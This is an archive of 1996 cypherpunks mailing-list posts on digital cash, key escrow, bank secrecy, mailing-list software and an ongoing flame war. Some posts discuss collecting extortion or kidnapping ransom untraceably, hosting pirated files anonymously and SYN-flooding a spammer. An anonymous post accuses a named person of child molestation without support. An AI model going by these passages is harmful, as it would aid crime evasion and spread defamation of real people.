Date: Tue, 15 Oct 1996 19:40:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <Pine.3.89.9610152025.C3275-0100000@skypoint-gw.globelle.com>
Message-ID: <H3DVVD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm receiving more harrassing e-mail from the asshole who threatened to sue
me for libeling Timmy May (fart).  Since this asshole has never been heard
from before, I suspect it's just another of Timmy May's tentacles.

Anyway, if you want a videotape, I'll put one together. If not, I won't.

>Date: Tue, 15 Oct 1996 20:36:36 -0500
>From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
>Subject: Re: Threats from FOTM (Friends of Timmy May)
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>In-Reply-To: <Vi7TVD1w165w@bwalk.dm.com>
>Message-Id: <Pine.3.89.9610152025.C3275-0100000@skypoint-gw.globelle.com>
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
>> I've been receiving multiples copies of threats of frivolous lawsuits in
>> connection with Sandy Sanford's kind offer to address the San Francisco
>
>Well then obviously your hands are tied then, aren't they?  That was easy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 15 Oct 1996 22:37:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: extortion via digital cash
In-Reply-To: <v02130503ae891eae8ee1@[10.0.2.15]>
Message-ID: <541s8v$dj1@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02130503ae891eae8ee1@[10.0.2.15]>,
Steve Schear <azur@netcom.com> wrote:
>In this scenario the only
>reasonable way left to track the money is via linkage (the size and timing
>of deposits and withdrawls in the kidnapper's account).

Who says the kidnapper has to have an account?

   - Ian "your internal net address is showing"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmR0VUZRiTErSPb1AQE3wQP9FRfPxDKFAbkiYhenN8EupLMVhWJjmmi7
IiO0gQfhn5dfyW94MeZSwRddBYfHs92qfHsoRQnFIU94Ryasquag7MeSPX3D5gnI
/DYYrCpgCkL0AlRH7XGS4+VvOQvjvwCSt2riuF/BfFCMZC1l8LossC99X71N/2B3
yJCGFPtBZ1E=
=Y32y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Tue, 15 Oct 1996 20:00:38 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Sameer should sue the SPA
In-Reply-To: <Pine.SCO.3.93.961015193307.9275E-100000@grctechs.va.grci.com>
Message-ID: <Pine.LNX.3.95.961015223706.2907A-100000@tgrafix.livesys.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Oct 1996, The Devil made Mark O. Aldrich write:

> On Tue, 15 Oct 1996, Matthew Ghio wrote:
> 
>> Also, SPA is going after C2 because one of their customers
>> allegedly had a link to a pirate site - but they have
>> (apparently) not gone after the pirate site itself!  Could
>> someone explain to me how there can be a finding of
>> contributory copyright infringement, when there is no direct
>> copyright infringement?
> <snip> 

> The SPA isn't going to go after pirate sites because they're operated by
> kids in basements who've got no money.  C2 has money.  The SPA likes
> money.  SPA sues C2.  (I'm sure there's some formal sentential logic that
> someone can post that will state this in even more succinct terms.)

Allow me to play the fool here for a minute.  If I really wanted to put up
a site which held copyrighted material available for download on the web
or via FTP, I could do it using two semi-anonymous accounts, a crontab 
entry, and the anonymous remailer network.


Since finding me, personally in the first place would be difficult at
best, and three doors down from impossible if I really tried...  Wouldn't
it make sense to go after whoever my enemies could get to?

Watch the movie "The Usual Suspects".  When Kaiser Solce wanted to get at
his enemies, he killed their friends, business associates, anyone who owed
them money, their families, etc...  A site to which no one makes any links
soon becomes an abandoned site.

Perhaps this is the "Deep Pockets Rule" at it's finest.  If you can't get
action from your enemy directly, attack his allies.  Whether they knew
they were allied against you or not is irrelevant.

Or maybe I've had too many beers.

---
"Obviously, the US Constitution isn't perfect, but
it's a lot better than what we have now." - Unknown
PGP key id - 0xDEACDFD1 - Full key available from
pgp-public-keys@pgp.mit.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 15 Oct 1996 21:10:25 -0700 (PDT)
To: scottb@aca.ca
Subject: Re: extortion via digital cash
In-Reply-To: <96Oct15.114214edt.15378-2@gateway.aca.ca>
Message-ID: <Pine.BSF.3.91.961015224615.27633A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 15 Oct 1996 scottb@aca.ca wrote:

> 
> Hi, I have been reading numerous threads on digital cash, and I have some
> questions I would like discussed.
> 
> currently when someone does extortion (kiddnapping too), they have two 
> choices;
> 
> 1-pick up the cash personally (or via a stooge)
> 2-transfer the funds via bank
> 
> Both ideas are bad, in that you stand a good chance at getting caught.
> 
> I was wondering, what if you demanded payment via Ecash, through nym 
> servers, aliases, etc.  From what I understand, it is just like cash, ie: no 
> record of transaction, but you get the added bonus of not having to meet the 
> other party-like a fund transfer.  Once you have your 1,000,000 Ecash, you 
> could dump it on a disk, and close your internet account (unless you really 
> really trust your privacy technology).  And I also think that you would have 
> the option to cash this into real funds at either the Mark Twain bank, or 
> likely somewhere in the Caymen Islands (maybe through those online gambling 
> houses).

With a very large number of ecash users, perhaps. Otherwise, you can 
kinda figure out which kid raided the cookie jar - he's the one with 
chocolate chips smeared all over his face.

Also - in order to communicate back to the perpetrator, the victim needs
to communicate to the first step in the chain. The operator of that chain
should not be held responisble for the system being used for criminal
activity IF they are unaware of such activity. However, if they are
informed that the perpetrator is forcing the victim to communicate through
their system, they are no longer unaware - privacy is one thing, aiding 
and abetting a crime is another. What's to keep the authorities from 
following the trail of crubs back to the perpetrator, other than the 
usual threats of "don't call the cops" and "you have 24 hours to respond?"
A few hops through some generally uncooperative jurisdictions might do, 
but perhaps El Dictator of Little Bannana Republic might just decide to 
hold the perpetrator's "payment" hostage ...

Sounds like the making of a good movie script. Can we get Tom Cruise and 
one of those Thinking Machines laptops??  ;)

-r.w.


> 
> I am hoping that this will spark some discussion, and maybe slow down the 
> dlv, TM spam war.

A worthy cause  :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 15 Oct 1996 23:14:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: extortion via digital cash
In-Reply-To: <96Oct15.114214edt.15378-2@gateway.aca.ca>
Message-ID: <541ug5$egc@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9610151846.AA00586@ch1d157nwk>,
Andrew Loewenstern  <andrew_loewenstern@il.us.swissbank.com> wrote:
>Some of the cut-n-choose protocols for after-the-fact catching of double  
>spenders would prevent this from happening.  Because the proto-coins from the  
>extortionist are blinded and the extortionee can't remove the blinding, it  
>would be impossible for the extortionee to properly complete the protocol with 
>the bank and pay-off the extortionist.

If you had Pipenet, or some other real-time anonymous communication system,
the extortionee could still carry out the cut-and-choose protocol by passing
the bank's requests for unblinding back to the extortionist.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmR9P0ZRiTErSPb1AQHDKwP/VDDS3izymRhDPUME58k2UjJ4MTH4QRpp
Vst4Wbys5hpXIB2bKOsaU44ZH9ayguGCKW+F/qK/mn8Y3o+2gnDlL9ErtZSie59x
0sh8XXTME8Q+dosvILU5QxQ55GBMNfMfALO5Iwjogw9efaXk3rABIXHcWHHu522C
liRnuNeS3uQ=
=nv41
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 15 Oct 1996 21:24:40 -0700 (PDT)
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: [Noise] Re: [POINTERS] On Vulis' net background
In-Reply-To: <Pine.3.89.9610152335.A3758-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.BSF.3.91.961015230801.27633B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Still more on this rather silly topic:
(Hey - at least I put "noise" on it)  :)

below:

On Tue, 15 Oct 1996, Douglas B. Renner wrote:

> Some *very* informative background data may be found at:
> 
> http://www.math.harvard.edu/~verbit/scs/cranks/from-Schlomo.html#vulis
> 
> Of course the title KOTM may also have been fraudulently obtained (if USENET 
> vote forgery bears any relevance...)
> see: "Fraudulent votes from bwalk.dm.com cited" in (are we surprised?)
> news.admin.net-abuse.misc   Here's a pointer to one archive:
> 
> http://www2.altavista.digital.com/cgi-bin/news?msg@3945@misc%2enews%2einternet%2ediscuss%26dlv+bwalk+dm+com
> 
> Doug
> 
> 

I don't know if anyone ever figured out who was forging votes for whom - 
the May '96 KOTM award was hotly contested, with forgeries flying every 
which way. If you have way too much time on your hands, read all about it 
at: http://www.wetware.com/mlegare/kotm/winnersk96.html#may96

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 15 Oct 1996 22:42:22 -0700 (PDT)
To: everheul@NGI.NL
Subject: Re: AW: binding cryptography
In-Reply-To: <01BBBAB8.1EC69460@port13.ztm.pstn.rijnhaave.net>
Message-ID: <qFPcZDvcwapi@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In your mail, you write:

> That is correct. Sorry that the BTW-statement is so evident. Some people 
> did not understand that if you *do* agree, then you *can* be breaking any 
> rules...

Which of course implies that to be effective, the system can't allow
anyone to opt out.

> >Which they will, and presumably already do.  Therefore, your proposal
> >does not and cannot hamper criminals.  Therefore, your proposal only
> >hampers law abiding citizen-units' access to uncompromised crypto.
>
> I do not agree. For instance, the encryption possibilities of wordperfect,
> and MS-word are weak; my mail-system (ms-exchange) does not have any 
> encryption at all. The security of these important Custom of The Shelf 
> products can and will be enhanced..

And as I pointed out above, the system only works when compromised-key
crypto is all that is available.  Where there are more secure options
available, people will choose them.  Your example is a good one:
WordPerfect, MS Word and MS Exchange may well choose key-compromised
crypto to gain the approval of the state.  Thus, those products will
never have real security.  I can't agree that key-compromised crypto is
secure at all, as it requires that some third party hold key (or the
means to recover keys).  You may argue that the supposed TRP can
actually be trusted.  I'm not willing to grant that trust without good
cause.  In the case of governments, I'm simply not willing to grant that
trust at all.  (to be fair, I acknowledge that the USA is not the
Netherlands, and you may not understand Americans' distrust of our
government)

> The point is that public available systems should *aid* not them in their 
> criminal activities, let them search for alternatives. Compare it with the 
> legislation we have here on the sell of guns. You sort of say: hey, that 
> does not help cause criminals will get it somewhere. I say, that is true, 
> but it will make their lifes more difficult, or maybe I should say less 
> easy.

My point is that I, as a member of the public, should not be restricted
in *my* choices.  Just as gun control laws make it harder for me to
lawfully purchase and own a gun, your proposal makes it harder for me to
lawfully obtain strong cryptography.  The obvious difference is that
guns are capable of inflicting fatal damage to humans, where
cryptography is not.

> >Registration plates do not "stop criminals".  Locks do not "stop
> >criminals" (although they might slow a criminal down).  Neither will
> >compromised crypto "stop criminals".  But all the above impinge on my
> >liberty.  Am I to give up yet another freedom?
>
> Our system slows down criminals too, or maybe I'd better say does
> not speed them up.

And it also makes me more vulnerable.  You are asking me to compromise
my own security because some other person might abuse his own
capability.  Will you also ask that I allow my muscles to atrophy to the
point where I cannot inflict damage with a blow from my fist, because
others might decide to fight?

It is important to remember that cryptography is 100% defensive.  It
_cannot_ be used in an offensive manner.  Any plan to weaken or restrict
cryptography is a plan to disallow defenses.  How can you ask me to
leave myself vulnerable to attackers?

> We believe our system gives a solution in which every democratic
> country on his own implement to their middle, without losing
> connectivity with countries that think otherwise.

Repressive states will endeavor not to allow connectivity with
non-repressive states.  Your plan only facilitates the repressors.
Thus, you offer weapons of repression to governments.

Still think it's such a good idea?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmRoQxvikii9febJAQHOvAQAhzUvsJapB+lBWM0MNjkOPFg0PtIFIKID
7uhWjzQ7Lwp7WlCeiqcB9+AdZuQMxAC/cq4uJai98jv8/5ba3t1uPiLMIx+ytSAN
q8UURDF3CWaX5TAzrC0OvdPUc+LONXVBebX0PMtwHaGZfsJWnebschJA36zRIY8Z
in8xv1t78Z8=
=GITW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 15 Oct 1996 21:01:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Majordomo w/ built-in security
In-Reply-To: <Pine.LNX.3.93.961015172038.21026C-100000@bigkahuna.alphawave.com>
Message-ID: <RwgVVD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher Durfy <chris@alphawave.com> writes:

> Hi guys, I'm new to the list, and it looks like a good one ;)

Yes - Timmy May (fart) has been pretty quiet lately.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Min-Ming Chin <mmchin@extol.com.my>
Date: Tue, 15 Oct 1996 02:29:20 -0700 (PDT)
To: coderpunks@toad.com
Subject: AS2805.65 standard?
Message-ID: <3263AFC0.7994@extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


Hi, there,

Anyone heard of the Australian security standard AS2805.65?  Beats me...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 15 Oct 1996 18:36:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [POINTERS] On Vulis' net background
Message-ID: <Pine.3.89.9610152335.A3758-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Some *very* informative background data may be found at:

http://www.math.harvard.edu/~verbit/scs/cranks/from-Schlomo.html#vulis

Of course the title KOTM may also have been fraudulently obtained (if USENET 
vote forgery bears any relevance...)
see: "Fraudulent votes from bwalk.dm.com cited" in (are we surprised?)
news.admin.net-abuse.misc   Here's a pointer to one archive:

http://www2.altavista.digital.com/cgi-bin/news?msg@3945@misc%2enews%2einternet%2ediscuss%26dlv+bwalk+dm+com

Doug





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 15 Oct 1996 23:49:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: extortion via digital cash
In-Reply-To: <96Oct15.114214edt.15378-2@gateway.aca.ca>
Message-ID: <v03007808ae8a44011806@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM -0400 10/15/96, Rabid Wombat wrote:

>Also - in order to communicate back to the perpetrator, the victim needs
>to communicate to the first step in the chain. The operator of that chain

BlackNet-type pools eliminate the chain. There is no "first step in the
chain," only a message pool or Usenet group which is propagated to tens of
thousands of sites around the world (and even available via one's satellite
dish and local cable, a la DirectPC, @Home, etc.).


>and abetting a crime is another. What's to keep the authorities from
>following the trail of crubs back to the perpetrator, other than the
>usual threats of "don't call the cops" and "you have 24 hours to respond?"
>A few hops through some generally uncooperative jurisdictions might do,
>but perhaps El Dictator of Little Bannana Republic might just decide to
>hold the perpetrator's "payment" hostage ...

Remailers, message pools, and untraceable cash are much more robust against
these sorts of attacks than you are portraying here.

>
>Sounds like the making of a good movie script. Can we get Tom Cruise and
>one of those Thinking Machines laptops??  ;)

Hollywood is too naive. I was interviewed by a screenwriter who came to a
Cypherpunks meeting, circa early 1994. She took copious notes and seemed
very interested in these sorts of things. From the plot she was tentatively
working on, I think the eventual outcome was "The Net," but it's possible
her script never got made, or was used for background, or whatever. In any
case, "The Net" (and "Hackers") had essentially nothing very sophisticated
in it.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Wed, 16 Oct 1996 00:02:26 -0700 (PDT)
To: "'Vladimir Z. Nuri'" <cypherpunks@toad.com>
Subject: RE: mail software for multiple addrs
Message-ID: <01BBBAF6.AD64B4C0@king1-19.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


I use Win95 and Exchange for email, which works as follows:

In Exchange you can set up separate user "profiles", for which you enter all the info for any number of different ISP accounts, including the phone number for access, login name, and also password, if you wish.  Then when you open up Exchange you can select which account you want to connect to.  You can have a default connection, but after you've downloaded the email from one service, you can then select a different service to connect to and get your mail from there, and so on.

Each selection of a service provider will automatically:

1.  dial the service
2.  log you in
3.  enter your password, or allow you to enter it manually each time
4.  download your mail
5.  disconnect

There are bars at the top of the Exchange email list of messages by which you can sort your mail according to Sender, Subject, To, From, Date Sent, Date Received, Attachments, Level of Importance, etc., according as you click on each so-entitled bar.

Then you can highlight the messages and put them into folders and sub-folders.   Each provider brings up its own window of user-created folders.

At this time Exchange does not provide automatic filtering or "rules" to send certain messages to particular folders unless you're connected to an Exchange server, but there is a nifty new mail package front-end coming out very soon which will do this.  Then it will be possible to indicate that you want all your Cypherpunk mail going to the 'cpunk' folder, or messages from certain individuals going into a folder by their name (or you can send their email to the 'Delete' folder and set this folder to automatically delete all those messages when you exit the mail program). 

With Win95 you can also connect to a service provider through a semi-GUI interface for shell-access only (called Hyperterminal, similar to a telnet window) and use whatever software the provider offers (like Pine), and this will appear in all text, except that you can set automatic connections.  You can create multiple icons with their own separate automatic connections for this type access as well.

Internet Explorer 3.0 also offers mail features similar to Netscape, but they're also still comparatively simple (limited) .

   ..
Blanc








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 16 Oct 1996 00:27:14 -0700 (PDT)
To: pclow@pc.jaring.my
Subject: Re: Royalties
Message-ID: <199610160726.AAA19611@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 10/16/96 +0800, pclow@pc.jaring.my wrote:
>>  Thus, PGP Inc. now
>> holds the exclusive license on commercial PGP products.
>
>Even the international version of PGP?

There are lots of copyright notices in PGP.  If you're trying to sell
PGP-derived code in a country that's part of the Berne Copyright Convention
or has other international copyright-honoring agreements,
it may apply.  But you can read it.

Copyright is more widely accepted internationally than patents on
mathematical algorithms, and the RSA patent in particular is not valid in 
most of the world because it was disclosed to the public before
the patent was applied for (to avoid American government tricks that
let the military classify and essentially confiscate processes that
are "national security" related when you apply for the patent.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Tue, 15 Oct 1996 23:21:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
In-Reply-To: <9610152204.AA02090@vampire.science.gmu.edu>
Message-ID: <0mN7df200YUe0gbas0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon <tfs@vampire.science.gmu.edu> writes:
> Peter Tre wrote:
> > Bouncing mail back to him may be emotionally satisfying, but
> > I suspect he filters it. He also has a skin as thick as a rhino's.
> 
> Not that I would do it, but SYN flooding could very well provide
> an adequate solution to Mr. Wallace.

SYN flods do nothing to stop *outgoing* connections, BTW, so this
would not directly stop spamming. It wouldn't be that hard to set up a
bunch of mail reception sites seperate from the targeted site, then
read mail/orders from them.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: douzzer@MIT.EDU
Date: Wed, 16 Oct 1996 04:25:42 -0700 (PDT)
To: everheul@NGI.NL
Subject: AW: Binding cryptography - a fraud-detectible alternative to key-escrow
Message-ID: <199610161120.EAA11108@lechter.chautauqua.com>
MIME-Version: 1.0
Content-Type: text/plain


oh pooh, you've seen this material run through over and over.
perhaps you respect my "opinion" because you know i am right. i know i
don't respect your position, because i am irrevocably convinced that
you are wrong.


acceptable:

-tracking of all chemicals which have been or can be manufactured into
  poisons, explosives, or psychoactives (cannot buy or sell
  anonymously)
-tracking of all automobiles and deadly weapons
-restrictions on yelling "fire!" in a crowded movie theater that isn't
  on fire

unacceptable:

-restrictions on what i can think, who i can speak to, what i can say,
  and how i say it, aside from shouting lies in a crowded movie
  theater or other such crowded public place.
-restrictions on how i can defend myself when my life is threatened
-prohibitions on drug purchase, sale, or use


i'm not ever going to change my position on this. you can drive bamboo
shoots under my fingernails and toenails, you can megadose me on LSD,
you can pull my teeth and administer electric shocks to my testicles,
and i am still going to believe that absolute information privacy, and
absolute freedom of thought and conversation, are inalienable human
rights.

if what you want to stop is airplane explosions, landmines, poisoned
water supplies, and mailbombs, please PLEASE make it your personal
mission to see that chemicals are more tightly controlled, airports
have the latest and greatest nuclear resonance tomographic imagers,
landmines aren't manufactured or sold any longer, water supplies are
tested around the clock using the latest technology, and everyone
knows not to open unsolicited packages.

if what you want to stop is drugs-prostitution-gambling, perhaps you
had better wake up. organized crime, and the drug lord, are created
and empowered by laws which make drug sales, prostitution, and
gambling illegal. why are they illegal? who is the victim?

if you take away the legal mandates which impose the wills of
religious zealots, you take away the structures which grant monopolies
to violent criminals. no amount of pontification, education, or
legislation is going to rid the world of people who will do whatever
is necessary to get drugs, visit prostitutes, and gamble. so if you
make them illegal, you instantly create a perpetual menace.

and now you expect me to agree that we should help the government
listen to everyone's communications, so that they can stop drug
dealers, prostitution rings, and betting pools?

hello? they created the problem.

i don't trust my government. i don't trust ANY government. government
is that segment of society that arrogates a monopoly on "legitimate
violence." it is composed of powergrabbers, and ass-kissers with
sinecures, who are paid with stolen money, some of it stolen from me.

the last thing in the world i am going to find acceptable is a law
that says i have to tell the government everything i tell my lover
over the phone.

fuck that!

-douzzer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 15 Oct 1996 23:45:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [Noise] Re: [*CORRECTED* POINTER] On Vulis' net background (fwd)
Message-ID: <Pine.3.89.9610160419.B612-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Oct 1996, Rabid Wombat wrote:
> Still more on this rather silly topic:
> (Hey - at least I put "noise" on it)  :)

Definitely needed.  :)
SORRY* I typo'ed the most incriminating link - the following should work:

http://www.math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html#vulis

(This is a fellow with a rather long & amazing history of net abuse.  
It's amazing enough to warrant a look.  There is a sub-section titled
"Who is Dimitri Vulis" that most CP readers would find shockingly
familiar.  It explains _quite_ a bit.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 16 Oct 1996 03:46:42 -0700 (PDT)
To: Christopher Durfy <chris@alphawave.com>
Subject: Re: Majordomo w/ built-in security
In-Reply-To: <Pine.LNX.3.93.961015172038.21026C-100000@bigkahuna.alphawave.com>
Message-ID: <Pine.NEB.3.93.961016054401.5621A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Oct 1996, Christopher Durfy wrote:

> Hi guys, I'm new to the list, and it looks like a good one ;)
> 
> I've got a question, and was hoping someone could point me in the right
> direction. Here's the situation:
> 
> Would the best way to get somehow incorporate PGP into the majordomo or
> smartlist (if it's possible) and either assign keys to all the doctors
> (or one key for ALL the doctors maybe, to cut on admin times....)
> 
> Anyone ever run up against a situation like this? Any pointers, horror
> stories or solutions are very welcome! 

It's being done right now. I run the mailing list cypher-list. It is
majordomo fully integrated with PGP. All submissions are keyed to the
recipient and all administrative traffic is encrypted in both directions.
For more information, check out my Web Page.

 John Perry KG5RG perry@alpha.jpunix.com PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Wed, 16 Oct 1996 03:09:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] PGP
Message-ID: <199610161004.GAA18733@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Given how Timmy C[rook] May's propensity to molest little children, is 
it any surprise that the state of California wants to have him 
castrated?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Tue, 15 Oct 1996 21:35:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Japan imposing crypto export restrictions!
Message-ID: <199610160435.GAA00926@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Another Cypherpunks exclusive!

Bowing to US pressure, the Japanese Ministry of International Trade and Industry (MITI) has quietly made changes to Japanese crypto export regulations.

In the past, export of crypto products from Japan was unregulated. The exporter had to file a pro-forma export declaration with MITI. The new regulations, imposed in recent weeks without public announcement, require the exporter to state the ultimate recipient of the crypto product. MITI then conducts a lengthy approval process that can take many weeks.

It is widely assumed that the US used the thread of trade sanctions to bring about this 180 degree turn in the attitude of the Japanese government.

The new regulations apply to exports from Japan to all countries, including the US.

--anon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 16 Oct 1996 05:14:05 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <Pine.SUN.3.94.961015211026.16787C-100000@polaris>
Message-ID: <199610161232.HAA14016@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961015211026.16787C-100000@polaris>, on 10/15/96 at 09:20 PM,
   Black Unicorn <unicorn@schloss.li> said:

>On Mon, 14 Oct 1996, William H. Geiger III wrote:

>> In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 at 04:01 AM,
>>    Black Unicorn <unicorn@schloss.li> said:

>> >Banking is as much about confidence as any business can be.  Anonymous or not, the
>> >presence of funds which
>> >infringe on regulations in one area or another are frightening to normal banking
>> >customers.
>> 
>> BULL!!!!
>> 
>> There are only two things the banking customers care about:
>> 
>> 1. Will my money be there in the morning?
>> 
>> 2. What is my rate of return?

>Both of these are affected by large scandals at banks.

scandals=unwarranted media hype.

True scandals of interest to the investment & banking community are along the lines of fraud, theft, embezzlement, poor or risky investment. Items that directly relate to 1 & 2. The S&L debacle in the US during the 80's is a good example.

The rest is just crap to either:

A: Sell more newspapers, and/or

B: Increase government power.

>In the case of the first example, runs on banks are hardly unheard of in relation to
>major and even somewhat minor revelations about the source of deposit funds where
>that source is criminal.  (Again, I cite Union Bank of Switzerland which saw a three
>day run of almost $200 million after
>disclosures about UBS accounts which were used for kidnapping randsom.
>DeBeers was one depositor which explicitly attributed their account
>closures to the news).

>The rate of return is directly affected by costs to the bank.  Legal costs (even in
>Switzerland) of defending against government and private party discovery and
>compelled disclosure are severe.  Need I even discuss the cost to the "legitimate"
>BCCI account holder?

What about the cost to Switzerland's banking industry due to the fact that they nolonger uphold their investors anonyminity?? Their industry has lost Billions due to their cow-towing to US and other governments snooping into investors accounts. What "cost" does that have to the account holders of their banks??

>And if customers are unconcerned about elements ther than #1 and #2,
>why are such pains taken to invest in offshore institutions where the
>costs (in sweat alone) can be higher?

Because it is justified by avoiding government interference in their financial activities which in the long run increases their rate of return well above the added cost of doing so.

>> The rest of it is a bunch of Govenment & Media hype & bull shit!!

>The above incidents are easily found with a quick trip to the library.

<sigh> Why so I can re-read the unwarranted media & government attacks on banking institutions because, god forbid, they actually took someone's money without running them over the coals first. Dam those nasty banks all to hell, they don't report every transaction of their investors to every government that may be interested.  

>The bottom line is that until anonyminity is not seen as some kind of
>invariably criminal act with respect to banking, legitimate and
>illegitimate money will be as like charged particles.

No the bottom line is money is money. Their is no such thing as "legitimate" or "illegitimate" money. Banks should not be forced to play policemen, their job is processing money.

Next time, get a CLUE.

>Next time, stick to web consulting.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Who died an made you god of the banking industry?? Last time I looked Walter Wriston was still alive and well. :) (Incase you are too clueless to know who that is I am sure a trip to your local library should help.)

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
